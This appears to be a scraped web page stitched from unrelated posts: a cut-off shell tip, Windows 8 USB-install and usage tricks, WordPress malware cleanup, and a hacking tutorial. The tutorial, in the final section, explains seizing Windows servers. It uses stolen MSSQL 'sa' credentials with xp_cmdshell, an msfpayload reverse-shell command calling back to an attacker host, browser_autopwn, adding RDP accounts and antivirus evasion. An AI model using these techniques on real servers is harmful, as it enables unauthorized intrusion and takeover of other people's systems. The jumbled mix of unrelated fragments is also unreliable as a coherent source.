Also after running a long command, if you realise that you have made a mistake, this command helps you replace that one word instead of running the whole command again, unlike the previous command which can only replace foo.

How to Create Windows 8 Bootable Pendrive:
Step 1 :Download Windows 7 USB/DVD download tool and install it.
This tool is available for free from Microsoft Corporation as well so you can get it from there too. Despite its name, this tool works with Windows 8 ISOs as well. You can use this tool for any version of Windows.
Step 2:After downloading and installing the tool, Run it , now you need to Browse and give the path where the ISO file is located in your computer.
Step 3:Now select whether you want to create a bootable DVD for windows or you want it to be a bootable pendrive. Here you need to select USB device because you want to make bootable pendrive.
Step 4: Browse and select the pendrive which you want to make bootable. Make sure that the pendrive has atleast 4 gb free . Now click on Begin Copying.
Step 5:
Once you begin copying , the tool will start creating bootable Windows 8 USB installer flash drive using the Windows 8 iso. Let this process complete , lastly when you see the message �Bootable USB Device created successfully�, you can restart your PC and boot from the USB drive.

When Microsoft released Windows 8 last year, a lot of PC users went �Meh!� It was the most radical change to the Windows interface we all came to love. With many of the controls for launching programs and accessing settings tucked away, many deemed it as a flop especially in the �ease of use� department.
Today i am going to show you 4 awesome Windows 8 Tricks, That you might not have heard of.
4 Awesome Windows 8 Tricks
However, with a few tricks, Windows 8 can be just as awesome as XP and Windows 7 � two of the easiest and most stable versions of the operating system. Here are a few:
1.Enable Metro-Style Internet Explorer To Play Flash Content:
Windows 8 comes with two versions of IE � one is on the Classic desktop and the other one is on the Metro interface. The problem with the latter is that it won�t play flash content if the website it�s on is not listed on Microsoft�s list of trusted websites.
You can wait for Microsoft to update their compatibility list and add your site (don�t hold your breath though). Or you can follow these instructions:
First, go to C:Users(Your User Folder)AppDataLocalMicrosoftInternet ExplorerIECompatData. Next, find the XML file named �iecompdata�, and open it with a text editor. Find the line of code which starts with the entry �Flash�, enter the URL of the website, save the changes to the XML file, and delete Metro IE�s browser history.
Once the site is added, you can now play or use its flash content with Metro IE.
2.Simultaneously Use Windows 8 Apps And The Classic Desktop:
Let�s say you�re using dual monitors. The operating system automatically uses the main screen while the secondary screen hosts the desktop. This setup makes full-screen multitasking on both interfaces a lot easier � Windows 8 apps for the main screen and desktop for the secondary screen, perfect?
In paper, it�s all good. However, as soon as you start using the desktop, the main screen�s Windows 8 apps disappear and switches to desktop!
However, there�s a workaround. On your main monitor, use Windows 8�s split-screen �snapping� feature to run the desktop and a Windows 8 Store app together. It looks silly at first since the desktop takes up a very small slice of the screen�s left side while the app takes up the rest.
However, after you set and use your secondary monitor for a full desktop view, viola! You now have an arrangement where a Windows 8 app and the desktop can peacefully coexist. Not to mention both windows are spacious enough to use.
3.How To Create A Picture Password
Want to keep your PC secure without setting up a complex password that you can vaguely remember? No problem! In Windows 8, you can create a picture password to keep your system secure minus the hassle of trying to remember which special characters you used.
Here�s how: First, press the Windows Key + I combination. This will take you to the settings charm. Next, proceed to �Change PC Settings� located at the bottom right of the window and go to the Users Tab.
Under �Sign-In Options�, click the �Create A Picture Password Button�. You will now be asked to choose any picture and define three gestures anywhere on it. It can be any combination of circles, swipes, or clicks. After confirming it, the picture password will be set.
Take note, the gestures do matter so remember them well. So maybe you can�t really get away from remembering stuff when accessing your PC? But hey, that�s a lot easier than trying to recall a 12-character password!
4.Give Your Windows 8 A �Hot & Fresh From The Factory� Feeling :
If Windows feels a little too slow for convenience, you can perform a Refresh. In the previous versions of Windows, you have to backup all of your files, device drivers, etc. before you can perform a fresh install.
It�s time-consuming and it�s tedious!
Not with Windows 8. You can perform a refresh without the need for backing up your data. First, go to Settings and click the tab �Change PC Settings�. Go to the �General� tab in the next window, and you should find the �Refresh Your PC Without Affecting Your Files� section.
Select �Get Started� and hit �Refresh�. Sit back, grab a cup of coffee, and relax. After a few minutes, your PC will restart and you now have a refresh and reinvigorated Windows 8!

Installing Your WordPress Again � Next important step involves Deleting all the files existing in the directory of WordPress except wp-config.php file and wp-content directory. After that you need to download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file by substituting the sample values by picking the actual database values from the wp-config.php file that you haven�t deleted as stated above. Now you can delete the present file and replace it with your own file.
Review Content Folder � Next task involved to check all the folders to find ones with any suspicious activity in your wp-content directory. So carefully analyze the folders content and remove any one that seems not to be belonging to you. If you later find that the folder was actually needed then you can get it back from your backup.

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.
But, these get the job done only on Linux servers. What about windows servers?
Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
- Using "sa" account to execute commands by MSSQL query via xp_cmdshell stored procedure.
- Using meterpreter payload to get a reverse shell over the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
Note: 11 FIREFOX ADDONS A HACKER MUST HAVE AND USE
Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.
1. Using xp_cmdshell-
Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.
Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download ithere.
After logging into MSSQL server with sa account, we get a list of databases and their contents.
Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)
Syntax for the query is-
xp_cmdshell [command]
For example, if I need to know my current privileges, I would query-
xp_cmdshell whoami
This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
2. Meterpreter Payload-
This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now its time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.
3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what Im trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.
Syntax for this-
iexplore.exe [URL]
Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.
